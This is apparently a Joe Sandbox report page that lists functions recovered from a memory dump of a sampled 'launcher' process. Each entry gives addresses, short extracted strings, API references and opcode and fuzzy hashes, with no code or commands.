Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: XY^
API String ID: 237503144-2925192336
Opcode ID: a9a179aed0137a5a89787da5d88659309cb4743ea0ccc2f57647c0d586911961
Instruction ID: 522dd63717226ceaa4172170e5885126b235a3cd7927cacf1f4a95230e1a2f22
Opcode Fuzzy Hash: a9a179aed0137a5a89787da5d88659309cb4743ea0ccc2f57647c0d586911961
Instruction Fuzzy Hash: 3A6120F1A042119FD354CF69C992B9ABFB1FB45304F2680ADD5069F3A6CB758842CBC5

Function 0040A8B0 Relevance: 5.4, Strings: 4, Instructions: 394COMMON

Download Yara Rule

Strings

")*+, xrefs: 0040AA02
EZSM, xrefs: 0040AD24, 0040AD2D, 0040AB85, 0040AD5F, 0040AD0C, 0040AB54
EZSM, xrefs: 0040ABB0
IK, xrefs: 0040A9C2

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: ")*+$EZSM$EZSM$IK
API String ID: 0-2209472741
Opcode ID: 56d5bbfbb09ae1763125399f6c511abc074d15a38b7f0ad5c466f9c825d2a1e9
Instruction ID: ff333759f08f4843f9b9f094083270354ca45b4ad419bc6bfb4955407d50028f
Opcode Fuzzy Hash: 56d5bbfbb09ae1763125399f6c511abc074d15a38b7f0ad5c466f9c825d2a1e9
Instruction Fuzzy Hash: 84D1047160C3508BC314DF2498416ABBBE3AFC1305F19893DE8C59F396E679C91A878B

Function 00408F60 Relevance: 5.3, Strings: 4, Instructions: 272COMMON

Download Yara Rule

Strings

J6\0, xrefs: 0040904F
[R, xrefs: 0040905F
P[, xrefs: 00408FE2
|jRl, xrefs: 00408FDA

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: J6\0$P[$[R$|jRl
API String ID: 0-3365168718
Opcode ID: d6d94da02e8cd90508f8c5309ad9ffaf61e439cbbe2c4c0beee08b07978d7d82
Instruction ID: ad8c322fdd1ce75a4fb5a8c159a6ade559ae23a3a4256504c3476bc83eb033bb
Opcode Fuzzy Hash: d6d94da02e8cd90508f8c5309ad9ffaf61e439cbbe2c4c0beee08b07978d7d82
Instruction Fuzzy Hash: 7271F76160C3928BD7158F39845437BFFE19FA6204F0885BEE4D5AB3C2D2398D0A8766

Function 00427560 Relevance: 5.3, Strings: 4, Instructions: 261COMMON

Download Yara Rule

Strings

ndnk, xrefs: 00427612
0~B, xrefs: 004275E6, 00427853
6|tx, xrefs: 0042760B
flfc, xrefs: 00427604

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: 0~B$6|tx$flfc$ndnk
API String ID: 0-2198546446
Opcode ID: a54debda1def4867eeba194353970970dfa52770f89fd955ba7e7cc636c6e677
Instruction ID: c2587915887cb13e90b12401c28954026b9d75fbc317da23493ad3bad8ea9e9c
Opcode Fuzzy Hash: a54debda1def4867eeba194353970970dfa52770f89fd955ba7e7cc636c6e677
Instruction Fuzzy Hash: F18145B9D04612CFCB108F65EC8166EB7B0FF46314F154279E851AB3A2E738A811CB99

Function 00415E4D Relevance: 4.7, Strings: 3, Instructions: 959COMMON

Download Yara Rule

Strings

Q-=5, xrefs: 004165F0, 00416629, 00416543, 00416547
C, xrefs: 004165E2
Q-=5, xrefs: 004166A6, 00416695

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID: C$Q-=5$Q-=5
API String ID: 2994545307-3019679163
Opcode ID: a3a43d8d10eeaea63244f0dd2f4fcf01349f936ad407f171a533dba6d173b21b
Instruction ID: 2a1cb871e2609ae236c279b9673157da9b7d3045a07846f010750479ef7ff231
Opcode Fuzzy Hash: a3a43d8d10eeaea63244f0dd2f4fcf01349f936ad407f171a533dba6d173b21b
Instruction Fuzzy Hash: F13259355083409FC724CF28CC806BBB7E2EF9A315F59896DE5D287261D738D942CB99

Function 0041F8F0 Relevance: 4.2, Strings: 3, Instructions: 434COMMON

Download Yara Rule

Strings

E?C9, xrefs: 0041FAAF
VJ, xrefs: 0041FD0A
A;45, xrefs: 0041FAB7

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: A;45$E?C9$VJ
API String ID: 0-2546191082
Opcode ID: 68bd94ef965e36f056518ede95d108b51a4429c19cd8227a4d16d01b290b4181
Instruction ID: 424df0228fa5d79d4793dcd331f41a1ac39c5f576573e628a3ce8b56204b69da
Opcode Fuzzy Hash: 68bd94ef965e36f056518ede95d108b51a4429c19cd8227a4d16d01b290b4181
Instruction Fuzzy Hash: 39C101B15183108BD724CF24C8527ABB7F1FFD1750F088A2DE8968B3A4E7799845CB96

Function 004095D0 Relevance: 4.1, Strings: 3, Instructions: 389COMMON

Download Yara Rule

Strings

<, xrefs: 00409846
8AB0B18BB72F96DD962CEBBDF1A894EB, xrefs: 004096CB
], xrefs: 00409798

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: 8AB0B18BB72F96DD962CEBBDF1A894EB$<$]
API String ID: 0-1354433892
Opcode ID: cd0d15e77ad3dd72b52046bd4ac9b4100f6737380a3c33ca3611d6cbc0a7cdf5
Instruction ID: b3e35ab696e0643a5f5b2b8a0ed1987cc6922a7ea6d0f90fcf89232711da8d01
Opcode Fuzzy Hash: cd0d15e77ad3dd72b52046bd4ac9b4100f6737380a3c33ca3611d6cbc0a7cdf5
Instruction Fuzzy Hash: F3C125B160C3444BE718DF75C89176BBBE2EB82314F14493DE4D59B391DA38C90ACB5A

Function 0040ADE9 Relevance: 4.0, Strings: 3, Instructions: 232COMMON

Download Yara Rule

Strings

=:, xrefs: 0040B07C
), xrefs: 0040B086
<", xrefs: 0040B072

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: )$<"$=:
API String ID: 0-3239783174
Opcode ID: 4a139811afe47f907610abc881c76abb2a6d67bd4a14cdb9f28f332dc7565f79
Instruction ID: 9f9f692c64da2d305c4bbe148212ceb10eb0a083f59c9e141566f343251d0f37
Opcode Fuzzy Hash: 4a139811afe47f907610abc881c76abb2a6d67bd4a14cdb9f28f332dc7565f79
Instruction Fuzzy Hash: C79181B4A05B42DFD3058F25C991381BFB1FF12310F05879AC1698BA92D738B419CF95

Function 00425AE5 Relevance: 2.9, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

==Vg, xrefs: 00426046
>:<*, xrefs: 00426036

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: ==Vg$>:<*
API String ID: 0-3611967697
Opcode ID: 22a4f769c9be456409a7d7b293a30284258b711c9192ffdf3e93fe2adc6e947c
Instruction ID: 26622f05e372e5c6f9b1b6c5989ef399571f8787230024f893718a75191546fe
Opcode Fuzzy Hash: 22a4f769c9be456409a7d7b293a30284258b711c9192ffdf3e93fe2adc6e947c
Instruction Fuzzy Hash: 90C145B560C755DBC7049F34A89127BBBE4AF86304F58487EF4C28B391E338D9058B5A

Function 0043AE2E Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

&7, xrefs: 0043B053
J9&, xrefs: 0043AEF4

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: &7$J9&
API String ID: 0-952755115
Opcode ID: 98c91185fe005509f17d74fbeeb7d176853f0d0dc76c5b627fcc19f626895b43
Instruction ID: 32391e4d0050debb43f10ce1d2b008523eebc891e2a651a5aecd50b65b18d32d
Opcode Fuzzy Hash: 98c91185fe005509f17d74fbeeb7d176853f0d0dc76c5b627fcc19f626895b43
Instruction Fuzzy Hash: A3515577A493004BD714DF7A6C4210BFBF2AAD6618F2AD97DD4C897312EA3C8406874A

Function 004247B0 Relevance: 2.7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

Strings

{}, xrefs: 004248AE
N, xrefs: 004248B6

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: N${}
API String ID: 0-601268450
Opcode ID: ddc733091bcf54132d8d129ab6869ddf4005bd704a619f535216f5cba75c4c88
Instruction ID: 74519baebd5366789230d6b732cf178f4fcc967b1ce9abf6379cf0fc21a475f1
Opcode Fuzzy Hash: ddc733091bcf54132d8d129ab6869ddf4005bd704a619f535216f5cba75c4c88
Instruction Fuzzy Hash: 7E6103B5A083108BD710DF24E89166BBBF1EFD2354F08892DE8C59B391E7788905CB96

Function 00428751 Relevance: 2.2, APIs: 1, Instructions: 729COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042878C

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: a1be86dc8bc4285251257946658b6de17d2442aa17583b2c32e1bedc2cae961b
Instruction ID: c515c3ab187248ce9489053d99e160838a5dea655bea0e7ed294d921e554690c
Opcode Fuzzy Hash: a1be86dc8bc4285251257946658b6de17d2442aa17583b2c32e1bedc2cae961b
Instruction Fuzzy Hash: 51225675F05224DFDB04CFA8E8817AE77B2AF8A310F59417DE501AB392CB395901CB59

Function 0043A120 Relevance: 1.9, Strings: 1, Instructions: 666COMMON

Download Yara Rule

Strings

f, xrefs: 0043A341

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: ad570d3784771969f4a0b0683f0849161cf8b5dc7dfd236c1ff926019bf53a2c
Instruction ID: 05b58cd6e64ae9db743e452dc4b3d0a9d984923eb4ef9d1f746e6fb6ac91a650
Opcode Fuzzy Hash: ad570d3784771969f4a0b0683f0849161cf8b5dc7dfd236c1ff926019bf53a2c
Instruction Fuzzy Hash: FB1202306483408FD714CF28C880A2BBBE1EB99314F285A2EE5D5973A1D735EC16CB97

Function 004297E0 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 00429AC8

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: f61a6243f4cbaaea40e29a2da2abc90fb35a9a8f0511b884f7581cc5ca6e41bf
Instruction ID: 432286050c9cce689e196b1209c6baaf56a1160152a460f2db052cbe81b131f8
Opcode Fuzzy Hash: f61a6243f4cbaaea40e29a2da2abc90fb35a9a8f0511b884f7581cc5ca6e41bf
Instruction Fuzzy Hash: 4ED12872B083216FC714CE25E44076BB7E9AF85314F48896EE89987382E738ED44C7D6

Function 0040BAEE Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

', xrefs: 0040BB06

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-2503692993
Opcode ID: 10dd812482fad8ebb1df80405c2a53995e819ba8416bcef3f77548e64526c281
Instruction ID: 1937cb860b4584487f9b444d81dfdd58a8076999dfab315c022d086aabc3b4b6
Opcode Fuzzy Hash: 10dd812482fad8ebb1df80405c2a53995e819ba8416bcef3f77548e64526c281
Instruction Fuzzy Hash: 1331067400C3458BC704DF10D8505ABB7F0EF92348F549A6DE899A73A1E738D546CB8E

Function 0043CDA0 Relevance: .7, Instructions: 675COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5942f9e2e245d9c1610e62b810eeeb0693153af1139df18e3241b6b5d8619d
Instruction ID: 2d49602da3a1e6dbb379d91c1e15579a4ba9e9e79545a347887c7419036b9c59
Opcode Fuzzy Hash: 7d5942f9e2e245d9c1610e62b810eeeb0693153af1139df18e3241b6b5d8619d
Instruction Fuzzy Hash: 3822F039A19211CFC704CF68E8D05AAB7F2FB8E315F0A84BDD98697351D734A946CB84

Function 00407410 Relevance: .7, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59bd3ac10152b41f7203c92da80cbf251157702d529506726a99bc29232755d8
Instruction ID: 1465b5a8c0ac73ff8cc0dcdf950b7a9b3247d1b8143aadae0d983aa401f32e55
Opcode Fuzzy Hash: 59bd3ac10152b41f7203c92da80cbf251157702d529506726a99bc29232755d8
Instruction Fuzzy Hash: DD22A432A087158BC724DF18D8846ABB3E1EFC4319F19893ED986A7381D738B955CB47

Function 0043CEC0 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef24c042cd8f1cb633c195c2d2dcb4d765b01c4297eb67dd6aec6319837cc97f
Instruction ID: dd64c0af4fde017af9df37c3feee2fa03d009e443aae2eb5e1191dbbd059f660
Opcode Fuzzy Hash: ef24c042cd8f1cb633c195c2d2dcb4d765b01c4297eb67dd6aec6319837cc97f
Instruction Fuzzy Hash: D912FF39A19211CFC708CF79E8905AAB7F2FB8E315F0985BDD98697351D734A806CB84

Function 0043CEDB Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4265bef3114a59b52678b10534be408c93be9a6abff9cd9764c63737899c50bc
Instruction ID: 7ce3b03e8bfdbc9fe752484a27b1af1d9a83eab8189378b47e78356ceb568ed3
Opcode Fuzzy Hash: 4265bef3114a59b52678b10534be408c93be9a6abff9cd9764c63737899c50bc
Instruction Fuzzy Hash: A912EF39B19211CFC708CF69E8905AAB7F2FB8E315F0985BDD98697351D734A806CB84

Function 0043CED9 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0b2b60b9311c18b6827c6d11fb5bc6ccf603bb5306d3f2fe9af3356cb30069
Instruction ID: ab49eea3f08b7325ca5f46c7c3fff26a96a54ac0f71416806ab34acb5bef0d4f
Opcode Fuzzy Hash: 4c0b2b60b9311c18b6827c6d11fb5bc6ccf603bb5306d3f2fe9af3356cb30069
Instruction Fuzzy Hash: 1A12EE39A19211CFC708CF68E8905AAB7F2FB8E315F0985BDD98697351D734A806CB84

Function 0043D020 Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8f0146d306a014df45a4b9854bb984c2b45e4061f2bb9fa6cb6e2e42157ad7
Instruction ID: 314b7f68ed38f494ccfd85db0a723046c252532c27d53d8865c6fd06660ae2b4
Opcode Fuzzy Hash: 8f8f0146d306a014df45a4b9854bb984c2b45e4061f2bb9fa6cb6e2e42157ad7
Instruction Fuzzy Hash: 0FF1EE39A09251CFC704CF68E8906AAB7F2FF8E315F1984BDD98697351D734A906CB84

Function 00424B4E Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c91125c5d5c1035804289f6cbd372068d5afe24f84cfd3c37d4b9a0207693d
Instruction ID: 0609d360a9f00854a91eb7e81956f2501a2eec6fcec37715a46289eee6a84a85
Opcode Fuzzy Hash: 31c91125c5d5c1035804289f6cbd372068d5afe24f84cfd3c37d4b9a0207693d
Instruction Fuzzy Hash: D7F1D379A00215CFDB08CF68E8817AEBBB1FF4A300F554169E511AB3A2D7749941CFD8

Function 0043D0B0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3190dc6a164847620bc09b9565b64c59d80334de4327cb8dfb0ff705671587
Instruction ID: 7b308f622511e07c334c560cbe9a477b8314d335dd39ac3e50a22aee23afa2e0
Opcode Fuzzy Hash: be3190dc6a164847620bc09b9565b64c59d80334de4327cb8dfb0ff705671587
Instruction Fuzzy Hash: A5E1EE35A08250CFC704CF69E8906AAB7F2FB8E315F0984BED98697351D734A906CB94

Function 004211C0 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e52208499a580797e5c2b97c27478fe8f3ec3ed90b51748838ad37332fd1357
Instruction ID: 2855094e23af851b2c17b921add0a69d7ae07c2e945be30cab03a4b98b6d5355
Opcode Fuzzy Hash: 1e52208499a580797e5c2b97c27478fe8f3ec3ed90b51748838ad37332fd1357
Instruction Fuzzy Hash: 65B12C717042209BD710AF24EC4277BB3E1EFA1354F49856EF895D73A1E738D806836A

Function 0040B4E6 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6fc9ceab0dad3d4f827a67e6825efb9b22d9928647f73bb28c607ffa903dfb
Instruction ID: 3f3d9b98bfd84ba2f742ed4db18e749958a445b59a882000f096eb4ca010c714
Opcode Fuzzy Hash: bd6fc9ceab0dad3d4f827a67e6825efb9b22d9928647f73bb28c607ffa903dfb
Instruction Fuzzy Hash: 93A1DA79204B01CFD7208F25ED81B16B7F1FF8A314F008979E95A87AA1C7B4A851CF68

Function 0040B2DC Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f313178b1fc16def154e6c4b57f5eda9b14dc535cf5c6e8ec4e18d2b3104fa
Instruction ID: 742b9e22e1b09183ac951b45638ae04e3d2c03d133f555b41b0b5861388410b9
Opcode Fuzzy Hash: f3f313178b1fc16def154e6c4b57f5eda9b14dc535cf5c6e8ec4e18d2b3104fa
Instruction Fuzzy Hash: B991FC79204701CFD7208F25EC81B2AB7F1FF8A314F108978E95687BA1C774A811CB68

Function 0040B30C Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213f33f4987b78d0f2f5b7cdbdbafa35c6fcb4e3e87f67a7125e260b138a1dd0
Instruction ID: 89e326ad618abd9926db55dce860a930f5d5f424fde1ae45c393be5492d5eb41
Opcode Fuzzy Hash: 213f33f4987b78d0f2f5b7cdbdbafa35c6fcb4e3e87f67a7125e260b138a1dd0
Instruction Fuzzy Hash: 1581FC79204701DFD7218F26ED81B16B7F1FF8A304F048979E55A87AA1C7B4A851CF68

Function 0041A690 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7549400ecdd475ba021afdf3d0d6d00ea2719bc4012e0d596cdac334d95ec4d
Instruction ID: df3686e07f596ff616bee36e13ac6f4b1109f9091347d844e47b2cd769905399
Opcode Fuzzy Hash: e7549400ecdd475ba021afdf3d0d6d00ea2719bc4012e0d596cdac334d95ec4d
Instruction Fuzzy Hash: 428181B0911B008BD320AF39C9526A3BFF1FF56310F548A2DD4D68B794E335A45ACB96

Function 0043CA70 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1414696af579f63bd7d12f420de7e8031b5a00c5043b33e0146d2255a6df5c
Instruction ID: 910a46ff11f963f1d417bd691f9fa7bf702ca1205238c46e106a5a024c10e2c6
Opcode Fuzzy Hash: 2a1414696af579f63bd7d12f420de7e8031b5a00c5043b33e0146d2255a6df5c
Instruction Fuzzy Hash: 03516333B287510BC71CCA388C5266BBAD39BCAB00F1E943ED485D7356DA38DD068781

Function 0041DDB0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7886c0305656760c123d0b9fbc1b7a62306dc1626af022899886d97783edae5
Instruction ID: e83a5c1674c9acd3f8c73038bab96d08edc0f2bae72d6c120336e0251aca4a47
Opcode Fuzzy Hash: a7886c0305656760c123d0b9fbc1b7a62306dc1626af022899886d97783edae5
Instruction Fuzzy Hash: E5618975A0C3904FC7258F29C88096B7BE1AF96314F0882AEF8A54B392D635DD46C796

Function 0040B188 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ceae42f583585c844c38aee44e7fc6d542f9d2f7ac8a8b7b679f9a76518e70d
Instruction ID: d6cd7bfc496e2c5747043d3c56d664553aea37b3f0bc714ab25a9475fd3cffe1
Opcode Fuzzy Hash: 5ceae42f583585c844c38aee44e7fc6d542f9d2f7ac8a8b7b679f9a76518e70d
Instruction Fuzzy Hash: EE519A79204601DFC7119F26ED80A2AB7F5FF8A305B008879F55A87B32D771A865CF68

Function 00421FB0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

